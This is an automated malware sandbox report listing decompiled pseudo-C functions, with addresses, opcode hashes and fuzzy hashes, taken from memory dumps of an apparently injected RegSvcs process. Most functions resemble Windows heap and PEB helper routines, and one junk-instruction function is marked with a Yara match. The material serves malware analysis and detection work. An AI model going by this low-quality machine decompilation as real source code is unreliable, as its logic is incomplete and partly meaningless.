Opcode Fuzzy Hash: bffb92d801bd3b769eab44fb8f79e5b7257139acf16155cf13fb8b650f2ad83a
Instruction Fuzzy Hash: E8F05470A14708AFD714EFB8E546AAEB7B4FF14704F5084A9F915EB291EE34D900CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00B18B58 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E00B18B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0xb3d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E00A67D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E00A8B640(E00A89AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x00b18b67
0x00b18b6f
0x00b18b72
0x00b18b7d
0x00b18b8f
0x00b18b7f
0x00b18b88
0x00b18b88
0x00b18b9a
0x00b18b9b
0x00b18b9d
0x00b18ba2
0x00b18bb5

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fea06efd9bd9bc251b8438b4b836549ad61083afa52e26386335f3799054ad76
Instruction ID: 172a77566a0947ace4dda04d9f457f2118c47aa9e895bef825f3438009790571
Opcode Fuzzy Hash: fea06efd9bd9bc251b8438b4b836549ad61083afa52e26386335f3799054ad76
Instruction Fuzzy Hash: 26F089B0A14258ABDB04EBA4DA46EBF73B4FF04304F540499BA05DB391FB34D900C794

Uniqueness

Uniqueness Score: -1.00%

Function 00B18CD6 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E00B18CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0xb3d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E00A67D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E00A8B640(E00A89AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x00b18ce5
0x00b18ced
0x00b18cf0
0x00b18cfb
0x00b18d0d
0x00b18cfd
0x00b18d06
0x00b18d06
0x00b18d18
0x00b18d19
0x00b18d1b
0x00b18d20
0x00b18d33

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18e61a854aa5ce2b187b66fc9ed7d31aa9c837b1fa9879121bf2e3860b0e1da0
Instruction ID: 2240cb37a12fa9da64425ac8511cd07277cb96aef45193f76b9ca337a0e3df3d
Opcode Fuzzy Hash: 18e61a854aa5ce2b187b66fc9ed7d31aa9c837b1fa9879121bf2e3860b0e1da0
Instruction Fuzzy Hash: A4F08970914208ABDB04EBA8E946DAE77B4FF04304F5401A9F515EB2D1EA34DD00C754

Uniqueness

Uniqueness Score: -1.00%

Function 00A6746D Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00A6746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E00A5EB70(__ecx, 0xb379a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E00A895D0();
							L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x00a6746d
0x00a6746d
0x00a6746d
0x00a67471
0x00a67488
0x00aaf92d
0x00a6748e
0x00a67491
0x00a67495
0x00aaf937
0x00aaf93a
0x00aaf94e
0x00aaf953
0x00aaf956
0x00aaf956
0x00a67495
0x00000000
0x00a67488
0x00a67473
0x00a67478
0x00a6747d
0x00a67481
0x00000000
0x00a67481
0x00a6747d
0x00a6747a
0x00000000

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cc3a056e068eb41c7208e944ec7c38d31c2ffdffacca95419998e25e51f9fac
Instruction ID: 88cc58206934c14ffaae01bfe82b6f7b7f40227276e6e269df9f5d5c39bb6806
Opcode Fuzzy Hash: 5cc3a056e068eb41c7208e944ec7c38d31c2ffdffacca95419998e25e51f9fac
Instruction Fuzzy Hash: 42F0E234A2C144EACF179BB8C948B7EBFB1AF04358F240265E851AB1A1EF24DC00C785

Uniqueness

Uniqueness Score: -1.00%

Function 00A44F2E Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A44F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E00B188F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E00A6C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0xa21030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x00a44f2e
0x00a44f34
0x00a44f38
0x00aa0b85
0x00aa0b85
0x00aa0b89
0x00aa0b9a
0x00aa0b9a
0x00aa0b9f
0x00000000
0x00aa0b9f
0x00aa0b94
0x00aa0b98
0x00000000
0x00000000
0x00000000
0x00aa0b98
0x00a44f3e
0x00a44f48
0x00000000
0x00a44f6e
0x00000000
0x00a44f70

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d87760cdd0789b27d9f552b5f81c4715aa32ea91cd87c8f7b93726e267ee905
Instruction ID: 682ef5eac9f5cdfe3f645b1bea51cf16999476497e88f459826a5b45e30f015b
Opcode Fuzzy Hash: 5d87760cdd0789b27d9f552b5f81c4715aa32ea91cd87c8f7b93726e267ee905
Instruction Fuzzy Hash: 73F0E2329256948FD770CB18C740F33B7E4EB167B8F444474E405879A1C734EC88C660

Uniqueness

Uniqueness Score: -1.00%

Function 00A7A44B Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A7A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0xb37b9c; // 0x0
				_t15 = __ecx;
				_t16 = L00A64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E00A8FA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x00a7a44b
0x00a7a453
0x00a7a472
0x00a7a476
0x00000000
0x00a7a493
0x00a7a47a
0x00a7a47f
0x00a7a486
0x00000000

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5da06a42a853ef66a6ca247fd3905bbcaf10506ac61ae32c23af1b52cc65da9a
Instruction ID: 38296b818b29b8efd5ed82e5616d290424199c0f89dcb4b74a10056f4e7db023
Opcode Fuzzy Hash: 5da06a42a853ef66a6ca247fd3905bbcaf10506ac61ae32c23af1b52cc65da9a
Instruction Fuzzy Hash: D8E09272A41421ABD2215B18EC01F6BB3ADDBE6751F19C035F508C7210DA69DD01C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00A4F358 Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00A4F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E00A7F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L00A64620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x00a4f35d
0x00a4f361
0x00a4f367
0x00a4f372
0x00a4f38c
0x00a4f38c
0x00a4f394

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: 985d57520a4875db3acf43bc62c304acc4d9df4cc7f7068c2019681acac9546d
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: 36E0D836A41118BFCB219AD9DE06F5BBBBCDB88B60F004165B904DB150D560AE00C2D0

Uniqueness

Uniqueness Score: -1.00%

Function 00A5FF60 Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A5FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0xa211a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E00B188F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E00A60050(_t14);
				}
			}

0x00a5ff66
0x00a5ff6b
0x00000000
0x00a5ff8f
0x00000000
0x00a5ff8f

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf15fce0995eda38b950ebb713fd6e33cc2678cfed354a68c377c8df57ca5ecf
Instruction ID: cfbc1a70aac18eedb6005163f68f75f3053f537e36ef7f64fa776f4cd5ea2e35
Opcode Fuzzy Hash: bf15fce0995eda38b950ebb713fd6e33cc2678cfed354a68c377c8df57ca5ecf
Instruction Fuzzy Hash: 67E0DFF02092049FD734DB55D340F2537A9BB62722F1A807DF80A4B902C631DC8CC216

Uniqueness

Uniqueness Score: -1.00%

Function 00AD41E8 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00AD41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0xb208f0);
				_t5 = E00A9D08C(__ebx, __edi, __esi);
				if( *0xb387ec == 0) {
					E00A5EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0xb387ec == 0) {
						 *0xb387f0 = 0xb387ec;
						 *0xb387ec = 0xb387ec;
						 *0xb387e8 = 0xb387e4;
						 *0xb387e4 = 0xb387e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L00AD4248();
				}
				return E00A9D0D1(_t5);
			}

0x00ad41e8
0x00ad41ea
0x00ad41ef
0x00ad41fb
0x00ad4206
0x00ad420b
0x00ad4216
0x00ad421d
0x00ad4222
0x00ad422c
0x00ad4231
0x00ad4231
0x00ad4236
0x00ad423d
0x00ad423d
0x00ad4247

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c29b2ee7abddd18508609e6b001a9138e3b440a527ee0e3d16bfe878d0f7e27e
Instruction ID: aae9b435443339d8b3aeaaabfcc7d9155c147ba959acc33e2e29f7d48a925d11
Opcode Fuzzy Hash: c29b2ee7abddd18508609e6b001a9138e3b440a527ee0e3d16bfe878d0f7e27e
Instruction Fuzzy Hash: 04F0F275920700DFCBA0EFA89A0574836E6F758311F30416AB009872A5CF346984CF03

Uniqueness

Uniqueness Score: -1.00%

Function 00AFD380 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AFD380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L00A4E8B0(__ecx, _a4, 0xfff);
					L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x00afd38a
0x00afd39b
0x00afd3b1
0x00000000
0x00afd3b6
0x00000000

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 5959c8090e561a0460ca96b8bf14f7d252ca697ccf9c13b951ac16ff762a446c
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: F3E0C231284208BBDB22AF84CD01F797B27EB50BA1F204031FF085E691C6759C91E6C5

Uniqueness

Uniqueness Score: -1.00%

Function 00A7A185 Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A7A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0xb367e4 >= 0xa) {
					if(_t5 < 0xb36800 || _t5 >= 0xb36900) {
						return L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E00A60010(0xb367e0, _t5);
				}
			}

0x00a7a190
0x00a7a1a6
0x00a7a1c2
0x00000000
0x00000000
0x00000000
0x00a7a192
0x00a7a192
0x00a7a19f
0x00a7a19f

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 823e4d4c9942aaf5273abba1b6d8a13617116a01263699d12ce031440c6174bc
Instruction ID: e6899e8f82fbb89da2599e27261d4d41b580fd598b54d1d17d8b2b5db7850edb
Opcode Fuzzy Hash: 823e4d4c9942aaf5273abba1b6d8a13617116a01263699d12ce031440c6174bc
Instruction Fuzzy Hash: 61D02B2313000076DB1C13158D14F2E3362E7D4704F71C59DF10B0B5A0DD708CD0810A

Uniqueness

Uniqueness Score: -1.00%

Function 00A716E0 Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A716E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E00A71710(0xb367e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L00A64620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x00a716e8
0x00a716ef
0x00a716f3
0x00a716fe
0x00000000
0x00a71700
0x00a7170d
0x00a7170d
0x00a716f2
0x00a716f2
0x00a716f2
0x00a716f2

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3123ad0341e4dccd53d5f233d1ca7e59922263cc1d56dd1bc0882e8b4bf8ccc6
Instruction ID: 5f3bd7875d7e1a978da055d5ed9de8c28416e1995ffae498ef6f7cf6858a5a81
Opcode Fuzzy Hash: 3123ad0341e4dccd53d5f233d1ca7e59922263cc1d56dd1bc0882e8b4bf8ccc6
Instruction Fuzzy Hash: A0D0A771100100A2DA2D5B189D15B1532D5DBC0785F38846CF10F494C1CFA0CC92E488

Uniqueness

Uniqueness Score: -1.00%

Function 00AC53CA Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AC53CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E00A5EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x00ac53ca
0x00ac53ce
0x00ac53d9
0x00ac53de
0x00ac53e1
0x00ac53e1
0x00ac53e6
0x00ac53f3
0x00000000
0x00ac53f8
0x00ac53fb

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 0d9e811dd2c883b64fe5126247a94579149f2682141ad58d36a662e88af5cc43
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: 58E0EC71A54AC49BCF16DF99C660F5EB7F5FB44B40F160458B4085F761C674AD40CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00406AB7 Relevance: .0, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00406AB7(void* __eax, void* __ecx, void* __edx, void* __edi) {

				asm("aas");
				asm("lodsd");
				return 1;
			}

0x00406abe
0x00406ac4
0x00406ad4

Memory Dump Source

Source File: 00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 678ccd14307d8c04018f7125dcd6987b4eec09398e6c54c1c48f14c308baaf41
Instruction ID: fac427cb121da581987e5037a73a26601a0bca900abb056b98919efff30c99d7
Opcode Fuzzy Hash: 678ccd14307d8c04018f7125dcd6987b4eec09398e6c54c1c48f14c308baaf41
Instruction Fuzzy Hash: E0C02BA290D01410C0300C0D3CC01F0F3E5C39B037F1037D3D808E7A209043C08B00C9

Uniqueness

Uniqueness Score: -1.00%

Function 00A5AAB0 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A5AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x00a5aab6
0x00a5aabb
0x00aaa442
0x00000000
0x00aaa448
0x00aaa454
0x00aaa454
0x00a5aac1
0x00a5aac1
0x00a5aac6
0x00a5aac6

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 3bd1a5553011ae18b52a2a6df73f7d3e11f0e6f9f35aa6e9bf2e14072569f6b0
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: BDD0C235352A80CFD6168B19C564B1573A4BB55B85FC50590E9018B662E768DD44CA11

Uniqueness

Uniqueness Score: -1.00%

Function 00A735A1 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A735A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E00A5EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x00a735a1
0x00a735a1
0x00a735a5
0x00a735ab
0x00a735ab
0x00a735b5
0x00000000
0x00a735c1
0x00a735b7

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: fbfafb319fc964ccaca0dbf99da96507c205f6424b1072439d95fc455eed4913
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 41D0A9335011809EDF01EB10CA1876C33B2BB00309F6AE069940A06852C33A4F0EF600

Uniqueness

Uniqueness Score: -1.00%

Function 00A4DB40 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A4DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L00A64620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x00a4db4d
0x00a4db54
0x00a4db5f
0x00a4db56
0x00a4db56
0x00a4db5c
0x00a4db5c

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: 98e5fb5f76e23db6c7ec0c7d1a2d6f4e58098583d680b4064fce471bf1603b0d
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: B0C08C34280A00AAEB221F20CE12B0176A0BB42B05F4504A07300DA0F0DB78DC02E600

Uniqueness

Uniqueness Score: -1.00%

Function 00ACA537 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00ACA537(intOrPtr _a4, intOrPtr _a8) {

				return L00A68E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x00aca553

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: 9c4eb247a28673c47e9504f6bf393f1cc999ff5c858917ed26621e06d5cc21b5
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: 2BC01232080248BBCB126E81CD01F067B2AEB94B60F008010BA480A5618A3AE970EA84

Uniqueness

Uniqueness Score: -1.00%

Function 00A63A1C Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A63A1C(intOrPtr _a4) {
				void* _t5;

				return L00A64620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x00a63a35

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 71da138d621b35ecb580a464e2e79631a5175f5eec5505e3e7275a6762f8cb00
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: D8C08C32080248BBC7126E41DD01F02BB29E795B60F000020B6040A5618532EC60D588

Uniqueness

Uniqueness Score: -1.00%

Function 00A4AD30 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A4AD30(intOrPtr _a4) {

				return L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x00a4ad49

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 4ed5d9f40145286c3c2d4794d8b598b632b2ab23e9fd774c6ace60618466f5de
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 7DC08C32090248BBC7126A45CE01F057B29E790B60F000020B6040A6628936E860D588

Uniqueness

Uniqueness Score: -1.00%

Function 00A576E2 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A576E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x00a576e4
0x00000000
0x00a576f8
0x00a576fd

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 892b479d38b1489f9dea0117be9bc7de9032d83e2c572e907cbee27d5dd40f4f
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: CCC08C701699805AEB2A5708CE21B283660BB08B0AF48059CBE01298A2C37CAC06C208

Uniqueness

Uniqueness Score: -1.00%

Function 00A736CC Relevance: .0, Instructions: 10
COMMON

Download Yara Rule
